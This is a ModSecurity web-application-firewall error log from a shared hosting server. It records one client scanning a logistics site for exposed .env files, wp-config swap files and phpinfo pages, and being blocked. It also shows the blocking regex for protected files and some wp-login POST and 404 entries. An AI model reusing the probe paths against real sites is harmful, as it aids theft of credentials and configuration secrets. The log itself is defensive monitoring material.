[Tue May 26 14:48:56.317497 2026] [security2:error] [pid 648203:tid 648352] [client 195.178.110.199:60352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVlgLEQDDtxJNiDrdTgmAAAAJg"]
[Tue May 26 14:48:56.380641 2026] [security2:error] [pid 648203:tid 648362] [client 195.178.110.199:60420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/ADMIN/.env"] [unique_id "ahVlgLEQDDtxJNiDrdTgnAAAAKI"]
[Tue May 26 14:48:56.412120 2026] [security2:error] [pid 648203:tid 648420] [client 195.178.110.199:60304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/BACK/.env"] [unique_id "ahVlgLEQDDtxJNiDrdTgowAAANw"]
[Tue May 26 14:48:56.460847 2026] [security2:error] [pid 648203:tid 648383] [client 195.178.110.199:60372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/BE/.env"] [unique_id "ahVlgLEQDDtxJNiDrdTgpAAAALc"]
[Tue May 26 14:48:56.462598 2026] [security2:error] [pid 648203:tid 648438] [client 195.178.110.199:60394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/Backend/.env"] [unique_id "ahVlgLEQDDtxJNiDrdTgpQAAAO4"]
[Tue May 26 14:48:56.533467 2026] [security2:error] [pid 648203:tid 648377] [client 195.178.110.199:60420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/Be/.env"] [unique_id "ahVlgLEQDDtxJNiDrdTgpwAAALE"]
[Tue May 26 14:48:56.799998 2026] [security2:error] [pid 648203:tid 648348] [client 216.26.228.114:28473] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlf7EQDDtxJNiDrdTgZQAAAJQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:56.842433 2026] [security2:error] [pid 648203:tid 648388] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlgLEQDDtxJNiDrdTgngAAALw"]
[Tue May 26 14:48:57.385614 2026] [security2:error] [pid 648203:tid 648456] [client 195.178.110.199:60408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/APP/.env"] [unique_id "ahVlgbEQDDtxJNiDrdTgzgAAAQA"]
[Tue May 26 14:48:57.524650 2026] [security2:error] [pid 648203:tid 648434] [client 195.178.110.199:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/Api/.env"] [unique_id "ahVlgbEQDDtxJNiDrdTg2AAAAOo"]
[Tue May 26 14:48:57.773871 2026] [security2:error] [pid 648203:tid 648360] [client 195.178.110.199:60440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/BACKEND/.env"] [unique_id "ahVlgbEQDDtxJNiDrdTg3wAAAKA"]
[Tue May 26 14:48:58.030261 2026] [security2:error] [pid 648203:tid 648386] [client 130.41.1.133:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVlf7EQDDtxJNiDrdTgSAAAui0"], referer: https://kingsclub.in/cafe/
[Tue May 26 14:48:58.521876 2026] [security2:error] [pid 648203:tid 648351] [client 70.187.73.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlgrEQDDtxJNiDrdTg8QAAAJc"]
[Tue May 26 14:48:58.924383 2026] [security2:error] [pid 648203:tid 648439] [client 104.207.43.104:19797] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlgbEQDDtxJNiDrdTg5gAAAO8"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:59.106757 2026] [security2:error] [pid 648203:tid 648404] [client 195.178.110.199:60334] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVlg7EQDDtxJNiDrdThJwAAAMw"]
[Tue May 26 14:48:59.147852 2026] [security2:error] [pid 648203:tid 648437] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlgrEQDDtxJNiDrdThDAAAAO0"]
[Tue May 26 14:48:59.637128 2026] [security2:error] [pid 648203:tid 648403] [client 195.178.110.199:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/admin-app/.env"] [unique_id "ahVlg7EQDDtxJNiDrdThRQAAAMs"]
[Tue May 26 14:48:59.729197 2026] [security2:error] [pid 648203:tid 648401] [client 195.178.110.199:60430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVlg7EQDDtxJNiDrdThSQAAAMk"]
[Tue May 26 14:48:59.790219 2026] [security2:error] [pid 648203:tid 648368] [client 195.178.110.199:60292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/administrator/.env"] [unique_id "ahVlg7EQDDtxJNiDrdThTgAAAKg"]
[Tue May 26 14:48:59.883890 2026] [security2:error] [pid 648203:tid 648424] [client 195.178.110.199:60314] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/api-node/.env"] [unique_id "ahVlg7EQDDtxJNiDrdThUQAAAOA"]
[Tue May 26 14:48:59.928186 2026] [security2:error] [pid 648203:tid 648423] [client 195.178.110.199:60378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/api/.env"] [unique_id "ahVlg7EQDDtxJNiDrdThVQAAAN8"]
[Tue May 26 14:48:59.998963 2026] [security2:error] [pid 648203:tid 648338] [client 195.178.110.199:60372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVlg7EQDDtxJNiDrdThXgAAAIo"]
[Tue May 26 14:49:00.221379 2026] [security2:error] [pid 648203:tid 648354] [client 195.178.110.199:60304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/api-backend/.env"] [unique_id "ahVlhLEQDDtxJNiDrdThYgAAAJo"]
[Tue May 26 14:49:00.274358 2026] [security2:error] [pid 648203:tid 648426] [client 195.178.110.199:60292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/api/info.php"] [unique_id "ahVlhLEQDDtxJNiDrdThZgAAAOI"]
[Tue May 26 14:49:00.478686 2026] [security2:error] [pid 648203:tid 648369] [client 195.178.110.199:60438] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/api/phpinfo.php"] [unique_id "ahVlhLEQDDtxJNiDrdThcAAAAKk"]
[Tue May 26 14:49:00.942088 2026] [security2:error] [pid 648203:tid 648357] [client 64.89.163.250:60533] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/.env"] [unique_id "ahVlhLEQDDtxJNiDrdThkAAAAJ0"]
[Tue May 26 14:49:00.984976 2026] [security2:error] [pid 648203:tid 648371] [client 195.178.110.199:60408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/app/.env"] [unique_id "ahVlhLEQDDtxJNiDrdThkgAAAKs"]
[Tue May 26 14:49:01.073811 2026] [security2:error] [pid 648203:tid 648425] [client 216.26.252.190:24921] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlg7EQDDtxJNiDrdThXQAAAOE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:01.232220 2026] [security2:error] [pid 648203:tid 648404] [client 195.178.110.199:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/apis/.env"] [unique_id "ahVlhbEQDDtxJNiDrdThpgAAAMw"]
[Tue May 26 14:49:01.297084 2026] [security2:error] [pid 648203:tid 648352] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlhLEQDDtxJNiDrdThigAAAJg"]
[Tue May 26 14:49:01.674565 2026] [autoindex:error] [pid 648203:tid 648440] [client 15.204.161.7:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:49:01.814994 2026] [security2:error] [pid 648203:tid 648438] [client 195.178.110.199:60378] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/application/.env"] [unique_id "ahVlhbEQDDtxJNiDrdTh0AAAAO4"]
[Tue May 26 14:49:01.835729 2026] [security2:error] [pid 648203:tid 648411] [client 195.178.110.199:56130] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/apps/.env"] [unique_id "ahVlhbEQDDtxJNiDrdTh0QAAANM"]
[Tue May 26 14:49:02.353909 2026] [security2:error] [pid 648203:tid 648443] [client 195.178.110.199:60420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/back-end/.env"] [unique_id "ahVlhrEQDDtxJNiDrdTh9AAAAPM"]
[Tue May 26 14:49:02.640689 2026] [security2:error] [pid 648203:tid 648347] [client 195.178.110.199:60448] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/back-api/.env"] [unique_id "ahVlhrEQDDtxJNiDrdTh_AAAAJM"]
[Tue May 26 14:49:02.680240 2026] [security2:error] [pid 648203:tid 648381] [client 195.178.110.199:60440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/back/.env"] [unique_id "ahVlhrEQDDtxJNiDrdTh_wAAALU"]
[Tue May 26 14:49:02.720051 2026] [security2:error] [pid 648203:tid 648341] [client 195.178.110.199:60394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend/.env"] [unique_id "ahVlhrEQDDtxJNiDrdTiAQAAAI0"]
[Tue May 26 14:49:02.948593 2026] [security2:error] [pid 648203:tid 648383] [client 195.178.110.199:56146] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backup/.env"] [unique_id "ahVlhrEQDDtxJNiDrdTiEgAAALc"]
[Tue May 26 14:49:03.015921 2026] [security2:error] [pid 648203:tid 648368] [client 195.178.110.199:60462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/backend-api/.env"] [unique_id "ahVlh7EQDDtxJNiDrdTiFwAAAKg"]
[Tue May 26 14:49:03.244352 2026] [security2:error] [pid 648203:tid 648436] [client 209.50.167.102:64445] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlhrEQDDtxJNiDrdTh5QAAAOw"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:03.291720 2026] [security2:error] [pid 648203:tid 648354] [client 195.178.110.199:60408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/be/.env"] [unique_id "ahVlh7EQDDtxJNiDrdTiJwAAAJo"]
[Tue May 26 14:49:03.293617 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:60440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/client/.env"] [unique_id "ahVlh7EQDDtxJNiDrdTiKAAAAOM"]
[Tue May 26 14:49:03.315557 2026] [security2:error] [pid 648203:tid 648386] [client 195.178.110.199:60420] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/beta/.env"] [unique_id "ahVlh7EQDDtxJNiDrdTiKgAAALo"]
[Tue May 26 14:49:03.654409 2026] [security2:error] [pid 648203:tid 648349] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlh7EQDDtxJNiDrdTiJgAAAJU"]
[Tue May 26 14:49:03.722151 2026] [security2:error] [pid 648203:tid 648380] [client 195.178.110.199:60448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/config.php"] [unique_id "ahVlh7EQDDtxJNiDrdTiRgAAALQ"]
